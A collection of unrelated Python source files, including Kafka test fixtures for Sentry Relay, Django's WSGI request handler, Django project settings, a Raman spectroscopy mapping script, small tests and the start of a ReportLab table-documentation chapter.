data=open("D:\data.txt",'w+')
print(rbt.dyn.dynparms,tau_str,Yr,rbt.dyn.baseparms,file=data)
data.close()
|
from functools import partial
from multiprocessing import cpu_count, Pool
from unicodedata import category
from denite.filter.sorter_sublime import get_score
from .base import Base
class Filter(Base):
def __init__(self, vim):
super().__init__(vim)
self.name = 'sorter_sublime_multiprocess'
self.description = \
'sorter for fuzzy matching like sublime text based on lib_fts using multiprocessing'
self.pool = Pool(processes=cpu_count() - 1)
def filter(self, context):
if len(context['input']) == 0:
return context['candidates']
all_chunks = chunks(context['candidates'], cpu_count() - 1)
all_chunks = self.pool.map(partial(score, context['input']), all_chunks)
context['candidates'] = []
for c in all_chunks:
context['candidates'] += c
return sorted(
context['candidates'],
key=lambda candidate: -candidate['filter__rank']
)
def score(pattern, candidates):
for c in candidates:
c['filter__rank'] = get_score(pattern, c['word'])
return candidates
def chunks(l, n):
n = max(1, n)
return (l[i:i+n] for i in range(0, len(l), n))
|
import json
import msgpack
import uuid
import pytest
import os
import confluent_kafka as kafka
from copy import deepcopy
import json
@pytest.fixture
def get_topic_name():
"""
Generate a unique topic name for each test
"""
random = uuid.uuid4().hex
return lambda topic: f"relay-test-{topic}-{random}"
@pytest.fixture
def processing_config(get_topic_name):
"""
Returns a minimal configuration for setting up a relay capable of processing
:param options: initial options to be merged
:return: the altered options
"""
def inner(options=None):
# The CI script sets the kafka bootstrap server into system environment variable.
bootstrap_servers = os.environ.get("KAFKA_BOOTSTRAP_SERVER", "127.0.0.1:9092")
options = deepcopy(options) # avoid lateral effects
if options is None:
options = {}
if options.get("processing") is None:
options["processing"] = {}
processing = options["processing"]
processing["enabled"] = True
if processing.get("kafka_config") is None:
processing["kafka_config"] = [
{"name": "bootstrap.servers", "value": bootstrap_servers},
# {'name': 'batch.size', 'value': '0'} # do not batch messages
]
if processing.get("topics") is None:
processing["topics"] = {
"events": get_topic_name("events"),
"attachments": get_topic_name("attachments"),
"transactions": get_topic_name("transactions"),
"outcomes": get_topic_name("outcomes"),
"sessions": get_topic_name("sessions"),
"metrics": get_topic_name("metrics"),
}
if not processing.get("redis"):
processing["redis"] = "redis://127.0.0.1"
processing[
"projectconfig_cache_prefix"
] = f"relay-test-relayconfig-{uuid.uuid4()}"
return options
return inner
@pytest.fixture
def relay_with_processing(relay, mini_sentry, processing_config):
"""
Creates a fixture that configures a relay with processing enabled and that forwards
requests to the test ingestion topics
"""
def inner(options=None):
options = processing_config(options)
return relay(mini_sentry, options=options)
return inner
def kafka_producer(options):
# look for the servers (it is the only config we are interested in)
servers = [
elm["value"]
for elm in options["processing"]["kafka_config"]
if elm["name"] == "bootstrap.servers"
]
if not servers:
raise ValueError(
"Bad kafka_config, could not find 'bootstrap.servers'.\n"
"The configuration should have an entry of the format \n"
"{name:'bootstrap.servers', value:'127.0.0.1'} at path 'processing.kafka_config'"
)
return kafka.Producer({"bootstrap.servers": servers[0]})
@pytest.fixture
def kafka_consumer(request, get_topic_name, processing_config):
"""
Creates a fixture that, when called, returns an already subscribed kafka consumer.
"""
def inner(topic: str, options=None):
topic_name = get_topic_name(topic)
topics = [topic_name]
options = processing_config(options)
# look for the servers (it is the only config we are interested in)
servers = [
elm["value"]
for elm in options["processing"]["kafka_config"]
if elm["name"] == "bootstrap.servers"
]
if len(servers) < 1:
raise ValueError(
"Bad kafka_config, could not find 'bootstrap.servers'.\n"
"The configuration should have an entry of the format \n"
"{name:'bootstrap.servers', value:'127.0.0.1'} at path 'processing.kafka_config'"
)
servers = servers[0]
settings = {
"bootstrap.servers": servers,
"group.id": "test-consumer-%s" % uuid.uuid4().hex,
"enable.auto.commit": True,
"auto.offset.reset": "earliest",
}
consumer = kafka.Consumer(settings)
consumer.assign([kafka.TopicPartition(t, 0) for t in topics])
def die():
consumer.close()
request.addfinalizer(die)
return consumer, options, topic_name
return inner
class ConsumerBase(object):
def __init__(self, consumer, options, topic_name, timeout=None):
self.consumer = consumer
self.test_producer = kafka_producer(options)
self.topic_name = topic_name
self.timeout = timeout or 1
# Connect to the topic and poll a first test message.
# First poll takes forever, the next ones are fast.
self.assert_empty(timeout=5)
def poll(self, timeout=None):
if timeout is None:
timeout = self.timeout
return self.consumer.poll(timeout=timeout)
def assert_empty(self, timeout=None):
"""
An associated producer, that can send message on the same topic as the
consumer used for tests when we don't expect anything to come back we
can send a test message at the end and verify that it is the first and
only message on the queue (care must be taken to make sure that the
test message ends up in the same partition as the message we are checking).
"""
# First, give Relay a bit of time to process
assert self.poll(timeout=0.2) is None
# Then, send a custom message to ensure we're not just timing out
message = json.dumps({"__test__": uuid.uuid4().hex}).encode("utf8")
self.test_producer.produce(self.topic_name, message)
self.test_producer.flush(timeout=5)
rv = self.poll(timeout=timeout)
assert rv.error() is None
assert rv.value() == message, rv.value()
@pytest.fixture
def outcomes_consumer(kafka_consumer):
return lambda timeout=None, topic=None: OutcomesConsumer(
timeout=timeout, *kafka_consumer(topic or "outcomes")
)
def category_value(category):
if category == "default":
return 0
if category == "error":
return 1
if category == "transaction":
return 2
if category == "security":
return 3
if category == "attachment":
return 4
if category == "session":
return 5
assert False, "invalid category"
class OutcomesConsumer(ConsumerBase):
def _poll_all(self):
while True:
outcome = self.poll()
if outcome is None:
return
else:
yield outcome
def get_outcomes(self):
outcomes = list(self._poll_all())
for outcome in outcomes:
assert outcome.error() is None
return [json.loads(outcome.value()) for outcome in outcomes]
def get_outcome(self):
outcomes = self.get_outcomes()
assert len(outcomes) > 0, "No outcomes were consumed"
assert len(outcomes) == 1, "More than one outcome was consumed"
return outcomes[0]
def assert_rate_limited(self, reason, key_id=None, categories=None):
if categories is None:
outcome = self.get_outcome()
assert isinstance(outcome["category"], int)
outcomes = [outcome]
else:
outcomes = self.get_outcomes()
expected = set(category_value(category) for category in categories)
actual = set(outcome["category"] for outcome in outcomes)
assert actual == expected, (actual, expected)
for outcome in outcomes:
assert outcome["outcome"] == 2, outcome
assert outcome["reason"] == reason, outcome["reason"]
if key_id is not None:
assert outcome["key_id"] == key_id
def assert_dropped_internal(self):
outcome = self.get_outcome()
assert outcome["outcome"] == 3
assert outcome["reason"] == "internal"
def assert_dropped_unknown_project(self):
outcome = self.get_outcome()
assert outcome["outcome"] == 3
assert outcome["reason"] == "project_id"
@pytest.fixture
def events_consumer(kafka_consumer):
return lambda timeout=None: EventsConsumer(
timeout=timeout, *kafka_consumer("events")
)
@pytest.fixture
def transactions_consumer(kafka_consumer):
return lambda: EventsConsumer(*kafka_consumer("transactions"))
@pytest.fixture
def attachments_consumer(kafka_consumer):
return lambda: AttachmentsConsumer(*kafka_consumer("attachments"))
@pytest.fixture
def sessions_consumer(kafka_consumer):
return lambda: SessionsConsumer(*kafka_consumer("sessions"))
@pytest.fixture
def metrics_consumer(kafka_consumer):
# The default timeout of 3 seconds compensates for delays and jitter
return lambda timeout=3: MetricsConsumer(
timeout=timeout, *kafka_consumer("metrics")
)
class MetricsConsumer(ConsumerBase):
def get_metric(self, timeout=None):
message = self.poll(timeout=timeout)
assert message is not None
assert message.error() is None
return json.loads(message.value())
class SessionsConsumer(ConsumerBase):
def get_session(self):
message = self.poll()
assert message is not None
assert message.error() is None
return json.loads(message.value())
class EventsConsumer(ConsumerBase):
def get_event(self):
message = self.poll()
assert message is not None
assert message.error() is None
event = msgpack.unpackb(message.value(), raw=False, use_list=False)
assert event["type"] == "event"
return json.loads(event["payload"].decode("utf8")), event
def get_message(self):
message = self.poll()
assert message is not None
assert message.error() is None
return message, msgpack.unpackb(message.value(), raw=False, use_list=False)
class AttachmentsConsumer(EventsConsumer):
def get_attachment_chunk(self):
message = self.poll()
assert message is not None
assert message.error() is None
v = msgpack.unpackb(message.value(), raw=False, use_list=False)
assert v["type"] == "attachment_chunk", v["type"]
return v["payload"], v
def get_individual_attachment(self):
message = self.poll()
assert message is not None
assert message.error() is None
v = msgpack.unpackb(message.value(), raw=False, use_list=False)
assert v["type"] == "attachment", v["type"]
return v
|
from __future__ import unicode_literals
import cgi
import codecs
import logging
import sys
from io import BytesIO
from threading import Lock
import warnings
from django import http
from django.conf import settings
from django.core import signals
from django.core.handlers import base
from django.core.urlresolvers import set_script_prefix
from django.utils import datastructures
from django.utils.deprecation import RemovedInDjango19Warning
from django.utils.encoding import force_str, force_text
from django.utils.functional import cached_property
from django.utils import six
# For backwards compatibility -- lots of code uses this in the wild!
from django.http.response import REASON_PHRASES as STATUS_CODE_TEXT # NOQA
logger = logging.getLogger('django.request')
# encode() and decode() expect the charset to be a native string.
ISO_8859_1, UTF_8 = str('iso-8859-1'), str('utf-8')
class LimitedStream(object):
'''
LimitedStream wraps another stream in order to not allow reading from it
past specified amount of bytes.
'''
def __init__(self, stream, limit, buf_size=64 * 1024 * 1024):
self.stream = stream
self.remaining = limit
self.buffer = b''
self.buf_size = buf_size
def _read_limited(self, size=None):
if size is None or size > self.remaining:
size = self.remaining
if size == 0:
return b''
result = self.stream.read(size)
self.remaining -= len(result)
return result
def read(self, size=None):
if size is None:
result = self.buffer + self._read_limited()
self.buffer = b''
elif size < len(self.buffer):
result = self.buffer[:size]
self.buffer = self.buffer[size:]
else: # size >= len(self.buffer)
result = self.buffer + self._read_limited(size - len(self.buffer))
self.buffer = b''
return result
def readline(self, size=None):
while b'\n' not in self.buffer and \
(size is None or len(self.buffer) < size):
if size:
# since size is not None here, len(self.buffer) < size
chunk = self._read_limited(size - len(self.buffer))
else:
chunk = self._read_limited()
if not chunk:
break
self.buffer += chunk
sio = BytesIO(self.buffer)
if size:
line = sio.readline(size)
else:
line = sio.readline()
self.buffer = sio.read()
return line
class WSGIRequest(http.HttpRequest):
def __init__(self, environ):
script_name = get_script_name(environ)
path_info = get_path_info(environ)
if not path_info:
# Sometimes PATH_INFO exists, but is empty (e.g. accessing
# the SCRIPT_NAME URL without a trailing slash). We really need to
# operate as if they'd requested '/'. Not amazingly nice to force
# the path like this, but should be harmless.
path_info = '/'
self.environ = environ
self.path_info = path_info
# be careful to only replace the first slash in the path because of
# http://test/something and http://test//something being different as
# stated in http://www.ietf.org/rfc/rfc2396.txt
self.path = '%s/%s' % (script_name.rstrip('/'),
path_info.replace('/', '', 1))
self.META = environ
self.META['PATH_INFO'] = path_info
self.META['SCRIPT_NAME'] = script_name
self.method = environ['REQUEST_METHOD'].upper()
_, content_params = cgi.parse_header(environ.get('CONTENT_TYPE', ''))
if 'charset' in content_params:
try:
codecs.lookup(content_params['charset'])
except LookupError:
pass
else:
self.encoding = content_params['charset']
self._post_parse_error = False
try:
content_length = int(environ.get('CONTENT_LENGTH'))
except (ValueError, TypeError):
content_length = 0
self._stream = LimitedStream(self.environ['wsgi.input'], content_length)
self._read_started = False
self.resolver_match = None
def _get_scheme(self):
return self.environ.get('wsgi.url_scheme')
def _get_request(self):
warnings.warn('`request.REQUEST` is deprecated, use `request.GET` or '
'`request.POST` instead.', RemovedInDjango19Warning, 2)
if not hasattr(self, '_request'):
self._request = datastructures.MergeDict(self.POST, self.GET)
return self._request
@cached_property
def GET(self):
# The WSGI spec says 'QUERY_STRING' may be absent.
raw_query_string = get_bytes_from_wsgi(self.environ, 'QUERY_STRING', '')
return http.QueryDict(raw_query_string, encoding=self._encoding)
def _get_post(self):
if not hasattr(self, '_post'):
self._load_post_and_files()
return self._post
def _set_post(self, post):
self._post = post
@cached_property
def COOKIES(self):
raw_cookie = get_str_from_wsgi(self.environ, 'HTTP_COOKIE', '')
return http.parse_cookie(raw_cookie)
def _get_files(self):
if not hasattr(self, '_files'):
self._load_post_and_files()
return self._files
POST = property(_get_post, _set_post)
FILES = property(_get_files)
REQUEST = property(_get_request)
class WSGIHandler(base.BaseHandler):
initLock = Lock()
request_class = WSGIRequest
def __call__(self, environ, start_response):
# Set up middleware if needed. We couldn't do this earlier, because
# settings weren't available.
if self._request_middleware is None:
with self.initLock:
try:
# Check that middleware is still uninitialized.
if self._request_middleware is None:
self.load_middleware()
except:
# Unload whatever middleware we got
self._request_middleware = None
raise
set_script_prefix(get_script_name(environ))
signals.request_started.send(sender=self.__class__, environ=environ)
try:
request = self.request_class(environ)
except UnicodeDecodeError:
logger.warning('Bad Request (UnicodeDecodeError)',
exc_info=sys.exc_info(),
extra={
'status_code': 400,
}
)
response = http.HttpResponseBadRequest()
else:
response = self.get_response(request)
response._handler_class = self.__class__
status = '%s %s' % (response.status_code, response.reason_phrase)
response_headers = [(str(k), str(v)) for k, v in response.items()]
for c in response.cookies.values():
response_headers.append((str('Set-Cookie'), str(c.output(header=''))))
start_response(force_str(status), response_headers)
return response
def get_path_info(environ):
"""
Returns the HTTP request's PATH_INFO as a unicode string.
"""
path_info = get_bytes_from_wsgi(environ, 'PATH_INFO', '/')
# It'd be better to implement URI-to-IRI decoding, see #19508.
return path_info.decode(UTF_8)
def get_script_name(environ):
"""
Returns the equivalent of the HTTP request's SCRIPT_NAME environment
variable. If Apache mod_rewrite has been used, returns what would have been
the script name prior to any rewriting (so it's the script name as seen
from the client's perspective), unless the FORCE_SCRIPT_NAME setting is
set (to anything).
"""
if settings.FORCE_SCRIPT_NAME is not None:
return force_text(settings.FORCE_SCRIPT_NAME)
# If Apache's mod_rewrite had a whack at the URL, Apache set either
# SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any
# rewrites. Unfortunately not every Web server (lighttpd!) passes this
# information through all the time, so FORCE_SCRIPT_NAME, above, is still
# needed.
script_url = get_bytes_from_wsgi(environ, 'SCRIPT_URL', '')
if not script_url:
script_url = get_bytes_from_wsgi(environ, 'REDIRECT_URL', '')
if script_url:
path_info = get_bytes_from_wsgi(environ, 'PATH_INFO', '')
script_name = script_url[:-len(path_info)]
else:
script_name = get_bytes_from_wsgi(environ, 'SCRIPT_NAME', '')
# It'd be better to implement URI-to-IRI decoding, see #19508.
return script_name.decode(UTF_8)
def get_bytes_from_wsgi(environ, key, default):
"""
Get a value from the WSGI environ dictionary as bytes.
key and default should be str objects. Under Python 2 they may also be
unicode objects provided they only contain ASCII characters.
"""
value = environ.get(str(key), str(default))
# Under Python 3, non-ASCII values in the WSGI environ are arbitrarily
# decoded with ISO-8859-1. This is wrong for Django websites where UTF-8
# is the default. Re-encode to recover the original bytestring.
return value if six.PY2 else value.encode(ISO_8859_1)
def get_str_from_wsgi(environ, key, default):
"""
Get a value from the WSGI environ dictionary as bytes.
key and default should be str objects. Under Python 2 they may also be
unicode objects provided they only contain ASCII characters.
"""
value = environ.get(str(key), str(default))
# Same comment as above
return value if six.PY2 else value.encode(ISO_8859_1).decode(UTF_8, errors='replace')
|
from MultipleAccumulate import MultipleAccumulate
from TextViewer import TextViewer
from ViewerCreator import ViewerCreator
if __name__ == '__main__':
print("Hello, world!")
|
#! /usr/bin/env python3
###########################################################
# The example shows how to get mapping data #
# The peak ratio at 1315 cm^-1 and 1380 cm^-1 are plotted #
# Details see Small 14, 1804006 (2018). #
###########################################################
import numpy as np
from renishawWiRE import WDFReader
from _path import curdir, imgdir
try:
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
plot = True
except ImportError:
plot = False
def peak_in_range(spectra, wn, range, method="max", **params):
"""Find the max intensity of peak within range
method can be max, min, or mean
"""
cond = np.where((wn >= range[0]) & (wn <= range[1]))[0]
spectra_cut = spectra[:, :, cond]
return getattr(np, method)(spectra_cut, axis=2, **params)
def main():
filename = curdir / "spectra_files" / "streamline.wdf"
reader = WDFReader(filename)
print("Measurement: ", reader.measurement_type)
print("Scan: ", reader.scan_type)
assert reader.measurement_type == 3
assert reader.scan_type == 6
wn = reader.xdata
spectra = reader.spectra
print(wn.shape, spectra.shape)
x = reader.xpos
y = reader.ypos
print(len(x), len(y))
w, h = reader.map_shape
print("The size of mapping is {0:d} * {1:d}".
format(w, h))
# w and h are the measure in xy coordinates
# Level the spectra
spectra = spectra - np.min(spectra, axis=2, keepdims=True)
peaks_a = peak_in_range(spectra, wn, [1295, 1340])
peaks_b = peak_in_range(spectra, wn, [1350, 1400])
ratio = peaks_a / peaks_b
ratio_fl = ratio.flatten()
if plot is True:
plt.figure(figsize=(10, 5))
# Left plot histogram of Peak A/B ratio
plt.subplot(121)
img = mpimg.imread(reader.img, format="jpg")
img_x0, img_y0 = reader.img_origins
img_w, img_h = reader.img_dimensions
plt.imshow(img, extent=(img_x0, img_x0 + img_w,
img_y0 + img_h, img_y0))
plt.scatter(x, y, s=0.4, alpha=0.8)
# plt.hist(ratio_fl, bins=50, range=(0.1, 2))
# plt.xlabel("Ratio peak A / peak B")
# plt.ylabel("Counts")
# Right plot histogram of Peak A/B mapping
plt.subplot(122)
plt.imshow(peaks_b, interpolation="bicubic",
extent=[0, x.max() - x.min(),
y.max() - y.min(), 0],)
# vmin=0.5, vmax=1.5)
plt.xlabel("Mapping x [μm]")
plt.ylabel("Mapping y [μm]")
cb = plt.colorbar()
cb.ax.set_title("Signal")
plt.tight_layout()
plt.show(block=False)
plt.pause(3)
plt.savefig(imgdir / "mapping_streamline.png", dpi=100)
plt.close()
else:
pass
return
if __name__ == "__main__":
main()
|
"""
Base settings to build other settings files upon.
"""
from pathlib import Path
import environ
ROOT_DIR = Path(__file__).resolve(strict=True).parent.parent.parent
# osmweb/
APPS_DIR = ROOT_DIR / "osmweb"
env = environ.Env()
READ_DOT_ENV_FILE = env.bool("DJANGO_READ_DOT_ENV_FILE", default=False)
if READ_DOT_ENV_FILE:
# OS environment variables take precedence over variables from .env
env.read_env(str(ROOT_DIR / ".env"))
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# Local time zone. Choices are
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# though not all of them may be available with every OS.
# In Windows, this must be set to your system time zone.
TIME_ZONE = "UTC"
# https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = "en-us"
# https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# https://docs.djangoproject.com/en/dev/ref/settings/#locale-paths
LOCALE_PATHS = [str(ROOT_DIR / "locale")]
# DATABASES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
"default": env.db("DATABASE_URL", default="postgres:///osmweb")
}
DATABASES["default"]["ATOMIC_REQUESTS"] = True
# URLS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf
ROOT_URLCONF = "config.urls"
# https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = "config.wsgi.application"
# APPS
# ------------------------------------------------------------------------------
DJANGO_APPS = [
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.sites",
"django.contrib.messages",
"django.contrib.staticfiles",
# "django.contrib.humanize", # Handy template tags
"django.contrib.admin",
"django.forms",
]
THIRD_PARTY_APPS = [
"crispy_forms",
"allauth",
"allauth.account",
"allauth.socialaccount",
"rest_framework",
"rest_framework.authtoken",
"corsheaders",
]
LOCAL_APPS = [
"osmweb.users.apps.UsersConfig",
"osmweb.categories.apps.CategoriesConfig",
# Your stuff: custom apps go here
]
# https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIGRATIONS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#migration-modules
MIGRATION_MODULES = {"sites": "osmweb.contrib.sites.migrations"}
# AUTHENTICATION
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#authentication-backends
AUTHENTICATION_BACKENDS = [
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-user-model
AUTH_USER_MODEL = "users.User"
# https://docs.djangoproject.com/en/dev/ref/settings/#login-redirect-url
LOGIN_REDIRECT_URL = "users:redirect"
# https://docs.djangoproject.com/en/dev/ref/settings/#login-url
LOGIN_URL = "account_login"
# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
PASSWORD_HASHERS = [
# https://docs.djangoproject.com/en/dev/topics/auth/passwords/#using-argon2-with-django
"django.contrib.auth.hashers.Argon2PasswordHasher",
"django.contrib.auth.hashers.PBKDF2PasswordHasher",
"django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher",
"django.contrib.auth.hashers.BCryptSHA256PasswordHasher",
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# MIDDLEWARE
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#middleware
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"corsheaders.middleware.CorsMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.common.BrokenLinkEmailsMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
# STATIC
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR / "staticfiles")
# https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = "/static/"
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = [str(APPS_DIR / "static")]
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
# MEDIA
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR / "media")
# https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = "/media/"
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
"BACKEND": "django.template.backends.django.DjangoTemplates",
# https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
"DIRS": [str(APPS_DIR / "templates")],
"OPTIONS": {
# https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
"loaders": [
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
# https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages",
"osmweb.utils.context_processors.settings_context",
],
},
}
]
# https://docs.djangoproject.com/en/dev/ref/settings/#form-renderer
FORM_RENDERER = "django.forms.renderers.TemplatesSetting"
# http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = "bootstrap4"
# FIXTURES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#fixture-dirs
FIXTURE_DIRS = (str(APPS_DIR / "fixtures"),)
# SECURITY
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-httponly
SESSION_COOKIE_HTTPONLY = True
# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-httponly
CSRF_COOKIE_HTTPONLY = True
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-browser-xss-filter
SECURE_BROWSER_XSS_FILTER = True
# https://docs.djangoproject.com/en/dev/ref/settings/#x-frame-options
X_FRAME_OPTIONS = "DENY"
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = env(
"DJANGO_EMAIL_BACKEND", default="django.core.mail.backends.smtp.EmailBackend"
)
# https://docs.djangoproject.com/en/dev/ref/settings/#email-timeout
EMAIL_TIMEOUT = 5
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL.
ADMIN_URL = "admin/"
# https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = [("""Ashiqur Rahman""", "asheeq.bracu@gmail.com")]
# https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# LOGGING
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#logging
# See https://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s "
"%(process)d %(thread)d %(message)s"
}
},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
}
},
"root": {"level": "INFO", "handlers": ["console"]},
}
# django-allauth
# ------------------------------------------------------------------------------
ACCOUNT_ALLOW_REGISTRATION = env.bool("DJANGO_ACCOUNT_ALLOW_REGISTRATION", True)
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_AUTHENTICATION_METHOD = "username"
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_EMAIL_REQUIRED = True
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_ADAPTER = "osmweb.users.adapters.AccountAdapter"
# https://django-allauth.readthedocs.io/en/latest/configuration.html
SOCIALACCOUNT_ADAPTER = "osmweb.users.adapters.SocialAccountAdapter"
# django-rest-framework
# -------------------------------------------------------------------------------
# django-rest-framework - https://www.django-rest-framework.org/api-guide/settings/
REST_FRAMEWORK = {
"DEFAULT_AUTHENTICATION_CLASSES": (
"rest_framework.authentication.SessionAuthentication",
# "rest_framework.authentication.TokenAuthentication",
),
"DEFAULT_PERMISSION_CLASSES": ("rest_framework.permissions.IsAuthenticated",),
"DEFAULT_PAGINATION_CLASS": "rest_framework.pagination.PageNumberPagination",
"PAGE_SIZE": 5,
"DEFAULT_THROTTLE_CLASSES": (
"rest_framework.throttling.AnonRateThrottle",
"rest_framework.throttling.UserRateThrottle",
),
"DEFAULT_THROTTLE_RATES": {
"anon": "5/minute",
"user": "10/minute"
}
}
# django-cors-headers - https://github.com/adamchainz/django-cors-headers#setup
CORS_URLS_REGEX = r"^/api/.*$"
# Your stuff...
# ------------------------------------------------------------------------------
|
from helloNoushi import sayhello
def test_helloworld_no_param():
assert sayhello() == "Hello Lovely World ...!!!"
def test_helloworld_with_param():
assert sayhello('guys') == "Hello Lovely guys ...!!!"
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 3
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_0
from isi_sdk_8_0.models.http_settings_settings import HttpSettingsSettings # noqa: E501
from isi_sdk_8_0.rest import ApiException
class TestHttpSettingsSettings(unittest.TestCase):
"""HttpSettingsSettings unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testHttpSettingsSettings(self):
"""Test HttpSettingsSettings"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_0.models.http_settings_settings.HttpSettingsSettings() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
#Copyright ReportLab Europe Ltd. 2000-2017
#see license.txt for license details
#history https://hg.reportlab.com/hg-public/reportlab/log/tip/docs/userguide/ch6_tables.py
from tools.docco.rl_doc_utils import *
from reportlab.platypus import Image,ListFlowable, ListItem
import reportlab
heading1("Tables and TableStyles")
disc("""
The $Table$ and $LongTable$ classes derive from the $Flowable$ class and are intended
as a simple textual gridding mechanisms. The $longTable$ class uses a greedy algorithm
when calculating column widths and is intended for long tables where speed counts.
$Table$ cells can hold anything which can be converted to
a <b>Python</b> $string$ or $Flowables$ (or lists of $Flowables$).
""")
disc("""
Our present tables are a trade-off between efficient drawing and specification
and functionality. We assume the reader has some familiarity with HTML tables.
In brief, they have the following characteristics:
""")
bullet("""They can contain anything convertible to a string; flowable
objects such as other tables; or entire sub-stories""")
bullet("""They can work out the row heights to fit the data if you don't supply
the row height. (They can also work out the widths, but generally it is better
for a designer to set the width manually, and it draws faster).""")
bullet("""They can split across pages if needed (see the canSplit attribute).
You can specify that a number of rows at the top and bottom should be
repeated after the split (e.g. show the headers again on page 2,3,4...)""")
bullet("""They have a simple and powerful notation for specifying shading and
gridlines which works well with financial or database tables, where you
don't know the number of rows up front. You can easily say 'make the last row
bold and put a line above it'""")
bullet("""The style and data are separated, so you can declare a handful of table
styles and use them for a family of reports. Styes can also 'inherit', as with
paragraphs.""")
disc("""There is however one main limitation compared to an HTML table.
They define a simple rectangular grid. There is no simple row or column
spanning; if you need to span cells, you must nest tables inside table cells instead or use a more
